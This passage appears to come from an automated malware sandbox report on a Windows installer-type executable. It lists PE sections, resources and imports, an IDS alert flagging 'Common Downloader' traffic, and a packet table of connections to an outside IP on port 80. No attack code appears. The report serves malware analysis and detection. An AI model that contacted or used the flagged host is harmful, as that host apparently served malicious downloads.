IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x655f	0x6600	a3c5dfe5dc0df29304c4d0e7774629da	False	0.6697303921568627	data	6.492117638820737	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14b0	0x1600	4bf0a5dece47a0bc27bdc628f545fdb8	False	0.4401633522727273	data	5.0331695385230475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2b018	0x600	711ec617d4a15851196324b3f27f5ef6	False	0.5221354166666666	data	4.110501305513171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x36000	0x52000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x88000	0x428f8	0x42a00	7152769be67ff33ea9aad34c3b44db2c	False	0.5534599261257036	data	6.194095147936062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x883e8	0x12064	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9934306767080241
RT_ICON	0x9a450	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.17916715958831184
RT_ICON	0xaac78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2583298297246164
RT_ICON	0xb4120	0x8285	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9965282973692874
RT_ICON	0xbc3a8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.31968576709796676
RT_ICON	0xc1830	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3195559754369391
RT_ICON	0xc5a58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4262448132780083
RT_ICON	0xc8000	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5222795497185742
RT_ICON	0xc90a8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6114754098360655
RT_ICON	0xc9a30	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6959219858156028
RT_DIALOG	0xc9e98	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0xc9fe0	0x100	data	English	United States	0.5234375
RT_DIALOG	0xca0e0	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0xca200	0xb6	data	English	United States	0.7307692307692307
RT_DIALOG	0xca2b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xca318	0x92	Targa image data - Map 32 x 8292 x 1 +1	English	United States	0.7123287671232876
RT_VERSION	0xca3b0	0x2b8	COM executable for DOS	English	United States	0.4827586206896552
RT_MANIFEST	0xca668	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5625

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T12:24:47.936144+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49842	80	192.168.11.20	104.153.208.178

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:24:47.602469921 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.766968966 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.767189980 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.767525911 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.931874990 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.935977936 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936077118 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936101913 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936144114 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.936148882 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936338902 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936351061 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.936351061 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.936363935 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936438084 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936533928 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936645985 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936682940 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.936682940 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.936712027 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:47.936858892 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:47.937026024 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.100565910 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100660086 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100672007 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100682974 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100696087 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100717068 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.100792885 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100805998 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100855112 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100950956 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.100951910 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.100961924 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.100989103 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101001024 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101011992 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101035118 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101130962 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.101140022 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101141930 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101308107 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.101308107 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.101320028 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101320982 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101321936 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101321936 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101322889 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.101461887 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.101654053 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.101803064 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265321016 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265367985 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265402079 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265491962 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265528917 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265604019 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265628099 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265628099 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265666962 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265733004 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265780926 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265799046 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265799046 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265901089 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265928984 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.265969992 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.265969992 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266000032 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266052008 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266099930 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266139984 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266139984 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266155005 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266227961 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266307116 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266356945 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266412973 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266479015 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266522884 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266649008 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266652107 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266684055 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266729116 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266793013 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266819000 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266819000 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266819000 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.266868114 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.266990900 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267026901 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267071962 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267112970 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267158985 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267158985 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267298937 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267327070 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267328024 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267373085 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267497063 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267527103 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267573118 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267615080 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267668009 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267668009 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267693043 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267771959 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267838001 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.267867088 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.267987967 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.268007994 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.268007994 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.268011093 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.268037081 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.268093109 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.268184900 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.268227100 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.268347979 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.268347979 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.268544912 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.430500984 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.430591106 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.430788040 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.430906057 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.430916071 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.430995941 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431049109 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431114912 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431123018 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431201935 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431260109 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431309938 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431344986 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431344986 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431377888 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431448936 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431499958 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431515932 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431516886 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431581020 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431643009 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431684017 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431684971 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431708097 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431799889 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431859016 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.431880951 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.431952953 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432003975 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432025909 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432084084 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432142019 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432218075 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432218075 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432218075 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432245970 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432317972 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432364941 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432382107 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432451010 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432502031 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432534933 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432534933 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432571888 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432636976 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432692051 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432702065 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432702065 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432770967 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432831049 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432868958 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.432893038 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.432957888 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433007956 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433047056 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433047056 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433047056 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433074951 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433141947 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433193922 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433214903 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433273077 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433332920 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433382988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433382988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433382988 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433393955 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433465958 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433518887 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433553934 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433584929 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433651924 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433707952 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433725119 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433725119 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433725119 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433789015 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433844090 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433892965 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.433898926 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.433968067 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434020042 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434073925 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434073925 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434078932 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434153080 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434206009 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434232950 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434282064 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434341908 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434400082 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434401989 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434402943 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434402943 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434402943 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434482098 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434540987 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434571981 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434614897 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434675932 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434730053 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434746027 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434746981 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434746981 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434809923 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434871912 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.434909105 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.434936047 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435002089 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435056925 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435081959 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435081959 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435082912 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435136080 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435198069 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435249090 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435261965 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435332060 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435388088 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435422897 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435424089 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435424089 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435456991 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435524940 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435576916 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435597897 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435597897 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435656071 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435715914 CEST	80	49842	104.153.208.178	192.168.11.20
Aug 29, 2024 12:24:48.435764074 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435764074 CEST	49842	80	192.168.11.20	104.153.208.178
Aug 29, 2024 12:24:48.435777903 CEST	80	49842	104.153.208.178	192.168.11.20
